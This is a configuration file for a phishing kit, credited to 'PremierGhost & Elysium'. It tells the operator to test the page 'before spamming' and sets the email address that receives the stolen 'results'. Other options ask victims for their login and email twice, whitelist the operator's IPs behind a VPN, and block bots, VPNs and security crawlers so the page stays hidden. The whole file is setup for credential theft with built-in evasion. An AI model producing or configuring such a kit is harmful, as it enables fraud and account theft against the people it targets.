; .------..------.
; |E.--. ||P.--. |
; | (\/) || :/\: |
; | :\/: || (__) |
; | '--'E|| '--'P|
; `------'`------'

; Always test your page before spamming
; & most importantly, have a good day !
;   - 🐺 PremierGhost & Elysium 🐎 -

; Your email for results
; Options: email address

Email = "james696997@yahoo.com"

; Double login
; Options: on or off

LoginTwice = "off"

; Double email
; Options: on or off

EmailTwice = "on"

; Whitelist your IPs
; Use a VPN / Proxy !
; Options: IP or off

MyIP = "10.0.2.15, 69.69.69.69"

; AntibotPW Integration
; Options: API Key or off

AntibotPW = "off"

; Proxy, Hosting, Tor detection
; Options: on or off

VPN = "on"

; Proxy, Hosting, Tor detection
; Not 100% reliable though
; Options: on or off

HeuristicVPN = "on"

; Special "cloudflare" protection
; will block 99% of bots in theory
; Options: on or off

CFProtection = "on"

; Allow access to a specific country
; Options: country code or off

CountryLock = "off"